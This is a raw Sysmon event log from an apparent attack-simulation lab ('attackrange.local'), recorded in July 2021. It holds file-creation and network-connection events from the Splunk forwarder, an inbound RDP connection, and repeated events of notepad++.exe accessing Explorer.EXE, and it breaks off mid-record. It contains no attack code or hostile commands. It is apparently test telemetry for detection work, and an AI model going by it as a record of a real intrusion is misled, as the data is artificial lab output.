07:45:29.687{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F864CDCD945534D728D2C815FE215491,SHA256=F70B46B0A31F83ADAB3358DF5E3C8789025BB1BAE576B072C01C12A27E74B791,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806354Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:29.375{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59D94479E8E86C6669EABD7C00137283,SHA256=9DAD589CE577BFA57779AF798250A72D5B66F7319893DE976F54CA10CF693ADE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806358Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:30.891{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6345F0F5A31D2346FB9E1635C68E0DC4,SHA256=CC6E716C9D325742746672A38873C15FD82E901680148D3D586AF94655865C33,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:22.592{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50926-false10.0.1.12-8000- 23542300x80000000000000001046445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:30.702{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6019046E462A3C0A8C2E29E7CD701248,SHA256=915F54774406F819FF728AD77C3597595AB3081D92767F3979CF7954E2456714,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806357Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:29.227{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57172-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806356Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:30.063{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C3568F37FFE31110A9AC50D5A8457E98,SHA256=9016F3688A7DE7FAC171E59D6A78D45DFB9B2A7C7A042246E86526B72E81040A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806359Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:31.922{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E2B186C27533F9B9B00BA5453746B04,SHA256=8B7C3EC26A63F808A73B9599911181ABC12853AD787C6D2D386541CBD42E2DA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:31.717{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4896EE401210F33F5D1FBD37DDAE46A3,SHA256=D689FE1406D2CF3D719B4E7A78609CE883DCC5FD2E2D3FBF104497C9C6CB2AFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806360Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:32.953{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69A7FBE79CDE803EF0C48771CE9069A5,SHA256=A816989E36B0DF929CF11D2105FFE2D440495CF324908A73E2DB8862CA329A20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:32.720{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6867BEE9E8E4BC0966F03687D9E1601E,SHA256=58A9FFD46AE7B1B330D78DF4F4F01D02CBE745AF6AC7379AF7F90BCDE14DED5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806361Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:33.957{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B990913CDAE356203AD1A024839CA40,SHA256=0D2090AF6E38224D0CB2FD8B939888076553767E95C6AB974ED29378CD0F20C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:33.771{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3557984796DCE25EA2FD01EF42408D19,SHA256=6F47C18854A33DEFA18BC157EF0B80994F03624FC6EF18DB6A0EF9C63E12FC88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:33.771{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7B821F7B86B02A2294FFD052FBFDBC3,SHA256=832CCEF440B3984659C13C213530C7435390440388F20ABF8B3083FB75DCFD18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:33.732{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB73B33A15C03C97A36812351B3C3BB6,SHA256=6433533E01EC193CAA7F276A62AFFB4153A9CDDE25E9A3FD8F9C1AC3EDCA537B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806362Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:34.957{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C61E63A08A99F005038F08726138238,SHA256=ED6E373DB3B23016D20DCF9B2F2AE134ECA73531D1AE0B45CC0D220FC31B395E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:34.739{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4EFA884A2ADEB917C55023341B981C6,SHA256=4CD9BDC1BDDDA22A68572C030FF5468BE648178D05E1CC6680477DE4AC9E6593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806363Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:35.973{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F245DA06DDD20B8C168770C5969A08EA,SHA256=8FB8ACC2D226CA53E2131D9CAFDAFB18CDC612287792210ED861D1681B83F965,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:35.741{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CADFA8CC6D29A96239F2267AABD2E6ED,SHA256=5E8D85B66172A652BF28A1614272DADEEF863E68012B2C7F599D04F7F05AF712,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806365Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:36.973{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7024509B03FDD96FF17D7B3F73DD9E61,SHA256=F526321B70ABFB8D5A1DC11BDA1DAB515F8FB1973B727AC123F1F8A63751346D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:36.760{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C2C2133FFB6C293537C1BE6DEA3B9E3,SHA256=6B2F0B329DD9B1F6AC389DD62D4D45E217AD6289993EB8446D7FAB9049518BB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806364Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:35.231{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57173-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001046454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.772{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50927-false10.0.1.12-8000- 23542300x80000000000000001046458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:37.774{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E8A3F3A1D60D8B796C5C14345506A5A,SHA256=C4379CE0BE5391972754D17065DE3D2502E73355BC1C7E842620FFE1ECFDB569,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:37.743{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=27B91AA96770D85683AD75B32A91DE62,SHA256=CD9F0543256167E7A22EE22AC6A5B818D67A697AFB2DB34F328505503497B292,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:37.659{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3557984796DCE25EA2FD01EF42408D19,SHA256=6F47C18854A33DEFA18BC157EF0B80994F03624FC6EF18DB6A0EF9C63E12FC88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.990{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBF725C081D64FFA748542F83056A132,SHA256=D2EA28EEB09238293FEE4584C3CAA8DFD8C9D9A3E27ECA425FBBFBDCA29723CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:29.959{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-52160-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001046518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.974{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B8C49A67B6165D69DD2FAE37A7561FC,SHA256=64E473B66851AB54FE6E8E999942D8576729B06456C497B151B71CF464D8AD09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 23542300x8000000000000000806366Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:38.020{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2253FBBC6832A5FEF3F9B7526A9321BB,SHA256=628C0A32B68F1A1A7E183B52443C57C584564AA75CA41773688F72719BD66BE8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_